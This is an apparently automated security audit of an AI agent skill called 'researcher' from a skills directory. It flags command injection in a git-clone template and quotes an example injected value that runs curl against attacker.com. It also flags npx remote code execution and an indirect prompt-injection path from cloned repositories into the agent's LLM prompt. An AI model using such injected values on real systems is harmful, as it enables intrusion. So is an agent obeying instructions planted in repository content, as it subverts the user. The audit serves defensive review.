The Agent Skills Directory

[COMMAND_EXECUTION]: The workflow defined in 'workflows/repo_analyzer.toml' contains shell command templates that interpolate user-provided values like 'repo_url' and 'repo_dir' directly into a shell execution string ('git clone '{{repo_url}}' '{{repo_dir}}''). This structure is susceptible to command injection if a malicious URL contains single-quote escapes (e.g., a URL containing ' ; curl attacker.com ; ').- [REMOTE_CODE_EXECUTION]: In 'scripts/research.py', the skill attempts to find the 'repomix' utility and falls back to using 'npx' if no local binary is found. Executing code via 'npx' involves downloading and running packages from the npm registry, which constitutes runtime remote code execution.- [EXTERNAL_DOWNLOADS]: The skill is designed to clone external Git repositories from arbitrary third-party URLs provided as user input. While this is the core function, it facilitates the ingestion of untrusted external data.- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection through the analysis of external codebases. Evidence Chain: 1. Ingestion points: 'GitClone' and 'TreeScanner' nodes in 'workflows/repo_analyzer.toml' fetch data from external URLs. 2. Boundary markers: Absent; the 'Architect' node prompt does not include markers to distinguish repository content from instructions. 3. Capability inventory: 'scripts/research.py' and 'scripts/research_entry.py' utilize 'subprocess.run' for git operations and 'cargo run' for the internal Rust engine. 4. Sanitization: Absent; repository content is passed to the LLM without sanitization or escaping.

researcher